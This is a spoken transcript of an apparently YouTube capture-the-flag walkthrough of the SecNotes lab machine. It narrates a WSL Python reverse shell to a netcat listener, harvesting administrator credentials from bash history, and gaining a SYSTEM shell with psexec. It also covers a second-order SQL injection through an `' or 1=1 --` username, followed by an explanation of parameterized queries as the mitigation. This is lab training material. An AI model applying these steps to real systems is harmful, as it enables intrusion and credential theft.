py, because we are not in the tmp directory, right? Py, let's just do that. We do get it. So now what we can do is we can just do wsl python. Obviously we can check for Python as well. Python is present in this Linux machine. Yes, it is. So wsl python tmp reverse py. Before that, start your netcatalyst now on 5555 port. So obviously if you guys don't know what netcat is like, you get a connection from the target machine to the attack machine. You can listen, or you can send. And N switch is for numeric IPs, B is for verbose, more verbose you get more verbosity, and we have L for listening mode and P for the port number, that is 5555. So now we are in the listening mode, we are waiting for this to send a connection over here. Let's just hit enter and see if it works. So we do get a shell over here and it says root SecNotes, but unfortunately the box is not Linux, so if you do who am I, we are over here, so let's LA. We are in the root directory itself. We have the file system present over here, as well as we have bash history file. Okay, so obviously I try to enumerate things over here, try to find out any creds or something. We have the bash history file, which is not, being sent to dev null or something like that. So obviously we have some contents present over here, and you can check for multiple things and try to get into rabbit holes. But if you just look at the bash history file over here, so if you do cat bash history, so it looks like there's some SMB client authentication kind of thing which is happening over here. Okay, so it says administrator you so and so. Okay, so in short we get some creds. Obviously ignore this percentage sign, because earlier when we were trying to do SMB map, right, just try to add Tyler user with quotes and see if that bash thing got solved or not. Let's just try that. Take the password, percentage. Let's see if this works. Yeah, it does work. So you have to add it inside the codes, so you'll avoid this particular thing as well. And obviously you have to do setH as well, because earlier I was trying using SMB map using this thing, but it did not work, so I had to do setH. That's why it worked, and that's why you have to give the codes as well, so don't forget the codes. Okay, so it did work over here. Obviously what we'll try to do is, now we did get our credentials over here. We can just try to copy this. Don't copy the percentage, that's not the credential, that's like SMB client's path. I hope you guys know about this percent. You can check out for the usage over here, I guess. SMB client. I don't think so, but you can check out the man page maybe on Google or something like that. So in short, we get some another potential user, that is obviously your administrator, and the password as well. So if you want to quickly check if this is a valid password or something, so you can just check it over here itself. You can just, probably using SMB map. So we'll be using SMB map over here. We'll be giving the user as administrator, and we'll be giving the password as the one which we define, and also the host, that is 10.10.10.97. See if, so I'm just trying to check, because you may come across multiple credentials like from the web config files or something like that. So I'm just trying to check if, since SMB is open, is this a valid credential for the administrator user. So if it is valid, we'll probably try to check out and get a reverse shell using this creds. You can use PowerShell as well to try to send a IEX shell. Or since SMB is open, obviously it is a valid credential, and we do have read-write access to C share and as well as admin share. So we can use psexec itself over here. So in short, we do get the credential. This was one way of getting the credential. Okay. Another way is you can just do MI. Okay. So we are back to Tyler over here. We can just try and do a psexec and get a credential. But before that, I just want to show that how do we get this particular bash history without actually going and doing this reverse shell kind of thing using WSL, without using WSL at all. So if you can just check for Linux path in Windows, WSL I guess. So I'm just trying to get the home directory for that Linux subsystem. So over here, if you see, you can use WSL, LSLA, and all these kind of things. Okay, so if you look over here, we have to go in user profile and app data local. So user profile is nothing but our current users, profile you have to go in. So let's just go to, here it says Chris, but we have to go to Tyler, right? So this it mentions over here as well. So let's just do that and go to app data local packages. So go back, cd users, dir, we have Tyler user over here. So obviously that app data would not be present because that app data is hidden. So if we have to do get child item, and we'll do force over here, so it will show us the hidden files as well. So app data is present over here. Let's just go to app data, cd app data. So we have local over here. We need to go to local and then packages. So let's just do that. We can enter the entire path, but I'm just trying to show you all like how we can go through it. Packages. So we have multiple packages over here. What we need to look for is, it says over here, if you are running Ubuntu, you have to use this canonical group limited, Ubuntu Windows and so something. So let's just try to find for that. And what we can do is, we can just try a dir and into this directory, and you can do a find string to this particular path, that is canonical group, copy it and paste it over here. So we do get this entire part over here, because obviously it's a long list, right? It may be confusing. I'm just trying to show you all like a small way that you know this file is present. So let's just copy this selection and let's just do cd to this group. So we are in this part over here, and then we have to go to, once we go there, the files are stored at distro folder and local state root fs. So we have to go to local state, cd local state over here, then go to root fs. If you do dir now, so we get this Linux root directory. So we do have this, right, bin, dev, all these kind of things in Linux subsystem. So obviously you can go to the root directory over here, cd root, and if you see over here, we do have the bash history file over here. So let's just do not cat now, but type, because we are in the Windows system, not Linux, but yeah. So if you do type, we do get this password again over here. So this is the second way you can check it without using WSL. Try to check out the contents present over here. But I think it was better the first way, because you get like a proper shell and all these kind of things. And another thing is that you can even check for bash exe, but for some reason that did not work for me. So if I just go back and check for where bash exe file, you can even execute bash, like just enter bash and execute bash commands. So I think I can do cmdc. I'll just use the cmdc function where r, and I'll be checking for the C directory for a file name bash exe. So it may take some time before this thing happens. What we'll try to do is, we'll just try to get a psexec shell using that administrator, because we have a valid credential, right? So we can use psexec.py, or we can do locate psexec, so that we get the file. So this is the file which you're looking for. So let's just do that, hit enter. It will show you how to use it. So we have to give the target, that is the domain, username and password. Obviously we can add SecNotes over here, SecNotes, and then the administrator user. We can add the password, or we can add the password later, because probably it may give that bash error. So let's just add the password later. Enter the IP address 1097. It will prompt for the password. We'll give the password from here. So let's just copy it, paste it, hit enter. It says requesting share. Obviously we will get a system shell over here using psexec. For administrator share, I think we have to use win.exe. So system and administrator are somewhat the same, but system is used for like only system commands. Like, okay, so a system is not like a actual user which will log in as a password, whereas administrator will do log in as a password. So more or less it's the same, but yeah, we'll get a system shell over here. It's a bit different, not exactly the same, but in short, it's full access to your app. So if you do who am I over here, we are as system. If you go back, we'll just go to users. We are, this thing is okay. CD administrator. We are, we do have access to administrator obviously because we are system. We go to desktop. This psexec shell is a bit slow, but yeah. So we have root txt file over. We can very well read it. This is our root flag. So this was how the box was done. And also if we see, we have this bash command present. So we can try adding or running these two bash files over here. So we can probably run it using cmd as well. So if we do this, it says this inappropriate IoTL's device, for device, something like that. So I did not try to do much on it because I already got it using the WSL. Using this bash itself, you just enter like bash exe and you'll get a file or something like that. Okay, so this was the box like entirely to get the user flag as well. One more thing I want to show you all is that unintended path, which is very interesting, and let's just do that first. So probably we'll just close this. I don't think we require this anymore, so let's just close these things. Okay, so close these things as well. Okay, so what we'll try to do is we'll just try and go back to our SecNotes page. And obviously, if I did try SQL injection, I did forget, like I forgot to mention, once you have a custom login page, do check for authentication as well over here using SQL bypass. So I did try to do that, but SQL injection is not present over here in this login page itself, but there is a SQL injection present, which is like a second order SQL injection. So now if you had the mutated nuts user as well as mutated nuts node, so you have one node present over here as mutated nuts user, right? And we can probably try to add another node, but I don't think I want to do that. So in short, we have some node which is for user mutated nuts. So let's just sign out, and what we'll try to do is we'll just try to create an account first. Sign up now using like probably mutated nuts or probably like a test, and we can enter like or 1 is equal to 1 and then comment out the entire thing. So in short, we're trying to see if SQL injection works, but this thing would be like a second order SQL injection because we'll see that explanation in a bit. But if you add this thing, okay, and if you add a password, like probably we just enter the password as password itself over here as well, password itself. And if we submit it, ideally it should not let you create a user with this particular, this input validation is not done over here in short. So it should not, it lets you create a particular user using this. So there's no input validation in place over here. There's no SQL injection happening currently over here, but it may happen later. And there's no input validation. Obviously, there should be some input validation in place at the client side, obviously at the server side as well. That, you should not have this particular quotes present over here, or like, equal to sign or something like that. Special character should not be present in the username. Maybe add can be present, like because you add the email ID, right? So that can be present, but these things should not be present. But in short, this box does not let you sanitize it, or there's no input validation over here. So if you submit it, it does let us create that. And what we are trying to do is, we'll just try to log in again using that user, and if we keep password over here, and if we try to log in, we see that it says viewing secure nodes for this or this, but we get everyone's node. So all the users who are present over here, that is your Tyler user, because we saw earlier, right, Tyler user had these 3 nodes present over here. So we got that particular user's node as well as we got the mutated nuts user node. But we are not logged in as mutated nuts. We are logged in as this test 011 which we have created. So we get that node itself. So I'll just tell you all why it actually works. Obviously, you get the password directly from here and take the password and follow that steps which we saw earlier. So why this actually works is, so we'll just go to this thing over here which I've created. So in short, at the back end of the database, there'll be another database which says user ID and password. So I've not created that database as of now. But what will happen is when you're trying to log in as this, when you're trying to create an ID, this user got registered, okay? Registered user, that is this test 101, okay. So in short, when you try to create this or try to log in, first at the login page over here, there's no SQL injection present. What happens is once you log in, okay, I'll just try to show a password. Once you try to log in, probably there's some other script which is running in home PHP, I guess, which is trying to call out for the nodes present. So in short, so this is like I'm just giving you all a high level view. You can obviously check the source code of the file. It's the same thing which is present, but to make things better and easier to understand. So in short, once this home PHP loads, right, there'll be a script which says, select nodes from user that is mutated nuts. Ideally, it should happen that. But what is happening is, if we log in as mutated nuts, obviously, not this user. So what's happening is probably there's some SQL query present over here which says select node and select node, that is probably Tyler has like 3 nodes, right? So we have like these 3 nodes present over here. So let's just enter like random nodes and the node content, that is node content random, something like that. So in short, it will be like check for mutated nuts also has a node, that is mutated nuts, and also we have node from mutated nuts. So these are the 2 nodes present from these 2 users. Obviously I just created some random user over here as well. So once you try to load this page and this username is this, so now there is a second order SQL injection. Why? Because when we first created the account, there was no SQL injection. Now there is some different, when we log in, this thing is already saved in the database, so it's trying to fetch this user ID, and because it fetches this user ID, this SQL query breaks over here. Why? Because it does like select node, so you have to select node over here, and node content, that is this, from node table. So this, just consider this SQL table as node table, okay, just consider for this example, where it says where, so it's giving a condition, so that is user ID is equal to, so I'll just copy this over here. Ideally it should happen this, but malicious vulnerable, I'll just mention vulnerable. Okay, so ideally this thing should take place, and over here the user ID would actually be like, some username would be called, that is username, which would translate to, if I'm logging as mutated nuts, it would come as mutated nuts. So in short, what this would do is, this SQL table, it will be like select node, okay, that is this mutated nuts, and select node content as well, that is node from mutated nuts, which is present over here, right? Oh, I mentioned kindly subscribe, okay. Kindly subscribe, okay. So it will be like select node and node content from node table, that is this particular table, because these are the column names, right, where user ID, this is the user ID which is present, this user ID which is present is mutated nuts. So in short, it will take this this condition first, and it will select the node and the node content. So in short, the mutated nuts and kindly subscribe will come when we log in as mutated nuts user, so which we do over here. So if we do log in over here, we only get mutated nuts users node, because there's some second SQL string which is running query, which is trying to get the nodes over here in the home PHP. So this is what is happening ideally. But what happens maliciously, because the second order SQL injection which we had created using this user, because this is getting an input which is already saved in the database. We are not giving the additional input. Why this thing happened? Because input validation was not valid in the sign up page at first. And secondly is that this particular query is not using parameterized queries. Okay, so if you I'll just mention that as well, but let's just sign out. Let's just go back to our test user, test, and enter password itself. So now once you enter this, this query would be like, okay, now the user is test1 or 101, okay. So that means there is no more mutated nuts. The user is actually test. So this is the query, right? Username. So it's trying to get a username which we logged in, right? As this particular test or 1 is equal to 1. Now what will happen is it's saying select node content, obviously the same thing from node table where user ID is test at first. Okay, then it will be like, hey, you know what, test user is not present over here. But it mentions or over here, it's not mentioning and. So if it mentions and, obviously if the first condition does not get fulfilled, so it will break, the query will break as in it will be like, okay, it does not fulfill, so will not go further. But it's mentioning or over here, and it's mentioning or 1 is equal to 1. That means it's a true statement. So if it is a true statement, it's going to return everything. You got me? If I created another user over here, random user, it's going to list out data for that as well. So if I created something like new content over here also, random new content. So it's going to list out this thing as well, because 1 is equal to 1 is true. So it's going to list out all the things. That's how, and this thing is used obviously to comment out the rest of the code. But yeah, this is what it looks like in the SQL query, and that's how it's returning all the values over here using second order SQL injection. Why second order? Because we are not giving this input. Obviously you are logging in over here. In the database it's checking for, hey, this user does exist. Like it's checking for this thing over here, test over here, and then it's, you know, trying to do 101 and trying to return everything. So this content was already present in the username table earlier, right? Registered user over here. So it's trying to get this from here. So that's how this second order SQL injection is working over here. And also, if you'll want to know how to mitigate this, so it's like, you know, there are multiple ways to, you can use stored procedures as well as parameterized queries. So what happens in parameterized queries is, if you're sending this request, right? So why this thing is vulnerable? Because over here you are in the PHP code itself, there would be something like this, okay, like a function which says like function. I'm just writing this. It will not be the exact same PHP function, but I'm just creating a random function to make things easier to understand. So it will be like function get nodes. Okay, so this is the function which I'm creating, and this is the query over here. And get nodes, obviously we are trying to send a username over here, because we need to get a node from username. So in short, it would be like function get nodes and the username. So that means we are obviously will be sending the username over here whenever we call this particular function. So we'll probably call this function over here as get nodes, and we'll be giving the username, that is mutated nuts over here, or whatever will be like having a get content username, something like that. Just consider this. So if you do get nodes mutated nuts over here, so this entry, it's going to call this function and it's going to send this value to this parameter over here which you are sending, okay. So this thing would come over here then, in short, because we are calling the username over here. So now so this is like a bad practice, because we can obviously, once you do this, for mutated nuts it's fine, but if you send this malicious code over here, that this thing which we send for this user, so this thing would go over here, and this thing would come over here, and it would break the code itself, okay, and this code would be then sent to your SQL query. You'll be sending like a SQL string or something like that. So this code will then go to SQL. So in short, you broke the code already, and this thing you're sending to SQL. So that's why you should not use this, and you should use parameterized queries or stored procedures. So what parameterized queries would do is, it will try to create, you know, it will send two things. Firstly, it will be like, instead of sending this particular username, I've changed a lot of things. Okay, so instead of sending this particular username over here now, first I'll just try and send this query and the question. So it's like probably like, you know, it will wait for an input from this particular PHP page. So there's a SQL database, okay. So SQL database would probably be like, okay, first I'll send you this SQL main query. I'll send this to you. Then I'll send SQL parameter to you. So that would probably be this username parameter. That is. So I'm just giving a high level overview, okay. There may be things like few things like commands or the functions or something not properly written as it is for PHP, but I'm just trying to make things better to understand. So in short, what this particular parameterized queries would do is, first it will send this particular query over here, okay, and obviously it's like, it's like parameterized query, something parameterized query string, something like that, okay. I'm not sure, parameter or something. I'm not sure what it is, but it's that way, like, you have to enter those things. And once you do that, first it will send this thing to your database. PHP will be like, hey, you know what, this is our query which we want to run. So the SQL database will like, okay, I got it. Now you send me the parameter. So then later on SQL will be like, hey, your SQL database would be like, send me the parameter. So PHP would be like, hey, you know what, I'm sending you the parameter right away. So once it does mutated nuts, so then this thing is ready, the query over here, and then later on it's just going to take this thing and replace it with the username. Now even if I enter this particular thing as username right over here, which will come over here and eventually come over here, so we are sending another parameter. SQL database is ready with this query. It's already ready, only it needs the input value. So now it will add this input value, but it will not break over here. What this SQL database will do is, it will check for if any of these users exist in the database. It's not going to break like test or 1 is equal to 1, because it's going to have this thing ready and prepared. That's why it's made in prepared statements. So it's going to have this thing ready and set. It's waiting for this parameter. Once it gets this parameter, it's going to check for this. So it's like where user ID is set. So once you give this value, so it will just check in the database, hey, does this test code or 1 is equal to 1 dash dash space dash user is present. We'll check over here like, hey, you know what, it's not present, not present. Oh, it is present over here. So I'll just return the nodes which are present by this user only, test only, like whatever his nodes are present, like test only. So it will just return this particular user's name. But since that parameter query was not present over here, so that's why this thing is vulnerable to second order SQL injection. So obviously this thing is like, it was very good thing, like, SQL and second order SQL injection does happen in the real world very, like, quite frequently. So it's a good thing to know, and this was like a high level overview, just try to break it down as easy as possible. And yeah, PHP function may vary, because you can try to Google it and find out what is the exact code or something for the parameterized queries, but this was how it is done, and this is how the parameters queries help you, as well as stored procedures help you. So that's thing how you avoid SQL injection, as well as input validation in the first place. So if you don't give malicious input, so that user does not add the malicious input, so you cannot probably have SQL injection done. Obviously server-side input validation also is required. So this was the box, and there are 2 ways to do it. If you guys like the video, do give a thumbs up, and if you have not subscribed yet, do subscribe for more upcoming videos. If you all have any queries regarding CSRF, SQL or WSL, you all can ask me in the comments below. Okay, thank you.